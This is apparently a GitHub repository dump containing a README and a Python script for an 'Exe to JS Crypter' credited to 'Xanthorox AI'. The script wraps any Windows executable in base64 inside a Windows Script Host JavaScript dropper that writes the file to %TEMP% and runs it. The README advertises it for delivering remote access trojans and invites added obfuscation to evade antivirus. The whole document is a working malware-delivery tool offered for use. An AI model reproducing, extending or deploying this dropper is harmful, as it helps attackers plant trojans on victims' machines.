├── README.md └── exe to js_main_made_by_xanthorox.py /README.md: -------------------------------------------------------------------------------- 1 | # Exe to JS Crypter (Converted) + Builtin Obfuscator Added This Tool have been completely made by Xanthorox AI 2 | 3 | an simple python script for converting exe to js , standalone js can be used to convert exe payloade to .js file , Works on All windows version all types of R@t tested 4 | 5 | # Usage 6 | **python exetojs_made_by_xanthorox XCliientt.exe Output.js** 7 | 8 | # How The Script Works 9 | 10 | *Decode the Base64 data. 11 | 12 | *Write the original EXE content to a uniquely named file in the %TEMP% directory (e.g., tmp_xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx.exe). 13 | 14 | *Execute that temporary EXE file. 15 | 16 | Your can modify the script and add extra obfuscation to make it even more stronger for now this is just an simple script made by Xanthorox AI 17 | 18 | # Video Demo How it works with a r@t 19 | 20 | 21 | 22 | 23 | https://github.com/user-attachments/assets/6310f89e-e8b9-4129-b868-dcade228789c 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /exe to js_main_made_by_xanthorox.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import argparse 3 | import os 4 | import uuid 5 | 6 | # Whole Script is made by Xanthorox @xanthorox 7 | # JavaScript template using WSH (Windows Script Host) 8 | # It decodes Base64, writes to a temp file, executes, and tries to clean up. 9 | JS_TEMPLATE = """ 10 | // Disable error popups, show them in console if using cscript 11 | // On Error Resume Next; 12 | 13 | var b64Data = "{base64_data}"; 14 | 15 | // WSH Objects 16 | var fso = new ActiveXObject("Scripting.FileSystemObject"); 17 | var shell = new ActiveXObject("WScript.Shell"); 18 | var stream = null; // Initialize stream variable 19 | 20 | // --- Base64 Decoding Function --- 21 | // Source: Adapted from various online examples for WSH Base64 decoding 22 | // Uses MSXML2.DOMDocument which is generally available on Windows 23 | function decodeBase64(b64) {{ 24 | var dm = null, el = null; 25 | try {{ 26 | dm = new ActiveXObject('MSXML2.DOMDocument'); 27 | el = dm.createElement('b64'); 28 | el.dataType = 'bin.base64'; 29 | el.text = b64; 30 | return el.nodeTypedValue; // Returns byte array (VT_ARRAY | VT_UI1) 31 | }} catch(e) {{ 32 | WScript.Echo("Error initializing MSXML2.DOMDocument or decoding Base64: " + e.message); 33 | return null; 34 | }} finally {{ 35 | if (el) {{ /* No explicit cleanup needed for element */ }} 36 | if (dm) {{ /* No explicit cleanup needed for DOMDocument */ }} 37 | }} 38 | }} 39 | 40 | // --- Main Execution Logic --- 41 | var tempDir = shell.ExpandEnvironmentStrings("%TEMP%"); 42 | var tempFileName = "{temp_filename}"; // Unique name generated by Python 43 | var tempFilePath = fso.BuildPath(tempDir, tempFileName); 44 | var decodedBytes = null; 45 | 46 | // WScript.Echo("Attempting to decode Base64 data..."); 47 | decodedBytes = decodeBase64(b64Data); 48 | 49 | if (decodedBytes !== null) {{ 50 | // WScript.Echo("Decoding successful. Writing to temporary file: " + tempFilePath); 51 | try {{ 52 | // Use ADODB.Stream for writing binary data 53 | stream = new ActiveXObject("ADODB.Stream"); 54 | stream.Type = 1; // adTypeBinary 55 | stream.Open(); 56 | stream.Write(decodedBytes); 57 | stream.SaveToFile(tempFilePath, 2); // 2 = adSaveCreateOverWrite 58 | // WScript.Echo("Successfully wrote temporary file."); 59 | }} catch (e) {{ 60 | WScript.Echo("Error writing temporary file '" + tempFilePath + "': " + e.message); 61 | tempFilePath = null; // Prevent execution attempt if write failed 62 | }} finally {{ 63 | if (stream) {{ 64 | try {{ stream.Close(); }} catch (ignore) {{}} 65 | }} 66 | }} 67 | 68 | if (tempFilePath && fso.FileExists(tempFilePath)) {{ 69 | // WScript.Echo("Executing temporary file: " + tempFilePath); 70 | try {{ 71 | // Execute the file. 72 | // Use quotes for paths with spaces. 73 | // Arguments: Path, WindowStyle (1=Normal), WaitOnReturn (false=Async) 74 | shell.Run('"' + tempFilePath + '"', 1, false); 75 | // WScript.Echo("Execution command issued."); 76 | 77 | // --- Optional Cleanup --- 78 | // Cleanup is tricky because the JS script might exit before the EXE. 79 | // A common technique is to leave the file in TEMP, or launch 80 | // a secondary script to wait and delete. For simplicity, 81 | // we'll attempt a simple delete after a short delay, 82 | // but it's not guaranteed. 83 | // WScript.Sleep(5000); // Wait 5 seconds (adjust if needed) 84 | // if (fso.FileExists(tempFilePath)) {{ 85 | // // WScript.Echo("Attempting cleanup of temporary file..."); 86 | // try {{ fso.DeleteFile(tempFilePath); }} catch(e) {{ /* Ignore cleanup errors */ }} 87 | // }} 88 | 89 | }} catch (e) {{ 90 | WScript.Echo("Error executing file '" + tempFilePath + "': " + e.message); 91 | // Attempt cleanup even if execution failed 92 | if (fso.FileExists(tempFilePath)) {{ 93 | try {{ fso.DeleteFile(tempFilePath); }} catch (ignore) {{}} 94 | }} 95 | }} 96 | }} else if (tempFilePath) {{ 97 | WScript.Echo("Temporary file does not exist, cannot execute."); 98 | }} 99 | 100 | }} else {{ 101 | WScript.Echo("Failed to decode Base64 data. Cannot proceed."); 102 | }} 103 | 104 | // Optional: Keep script host running for a bit to see console output if using cscript 105 | // WScript.Sleep(3000); 106 | """ 107 | 108 | def create_js_runner(exe_path, js_path): 109 | """ 110 | Reads an EXE, encodes it to Base64, and embeds it into a JS WSH script. 111 | """ 112 | if not os.path.exists(exe_path): 113 | print(f"Error: Input EXE file not found: {exe_path}") 114 | return 115 | if not exe_path.lower().endswith(".exe"): 116 | print(f"Warning: Input file '{exe_path}' does not have a .exe extension.") 117 | 118 | print(f"Reading EXE file: {exe_path}") 119 | try: 120 | with open(exe_path, "rb") as f: 121 | exe_content = f.read() 122 | except Exception as e: 123 | print(f"Error reading EXE file: {e}") 124 | return 125 | 126 | print("Encoding EXE content to Base64...") 127 | try: 128 | # Encode bytes to Base64 bytes, then decode to UTF-8 string for JS 129 | base64_encoded_data = base64.b64encode(exe_content).decode('utf-8') 130 | except Exception as e: 131 | print(f"Error encoding to Base64: {e}") 132 | return 133 | 134 | # Generate a relatively unique temporary filename for the JS script to use 135 | temp_filename = f"tmp_{uuid.uuid4()}.exe" 136 | 137 | print(f"Generating JavaScript code (temporary file will be named: {temp_filename})...") 138 | js_code = JS_TEMPLATE.format( 139 | base64_data=base64_encoded_data, 140 | temp_filename=temp_filename 141 | ) 142 | 143 | print(f"Writing JavaScript to: {js_path}") 144 | try: 145 | with open(js_path, "w", encoding="utf-8") as f: 146 | f.write(js_code) 147 | print("JavaScript file created successfully.") 148 | print("\n--- WARNING ---") 149 | print("Antivirus software will likely detect this .js file as suspicious or malicious.") 150 | print(f"save it as '{temp_filename}' in the %TEMP% directory, and execute it.") 151 | print("Simple Crypter & Converter made by Xanthorox AI @xanthorox") 152 | print("---------------\n") 153 | 154 | except Exception as e: 155 | print(f"Error writing JavaScript file: {e}") 156 | return 157 | 158 | if __name__ == "__main__": 159 | parser = argparse.ArgumentParser( 160 | description="Embed an EXE file into a JavaScript runner using Base64 encoding.", 161 | epilog="WARNING: The generated .js file is likely to be flagged by antivirus software. Use responsibly." 162 | ) 163 | parser.add_argument("exe_file", help="Path to the input .exe file.") 164 | parser.add_argument("js_file", help="Path for the output .js file.") 165 | 166 | args = parser.parse_args() 167 | 168 | create_js_runner(args.exe_file, args.js_file) 169 | --------------------------------------------------------------------------------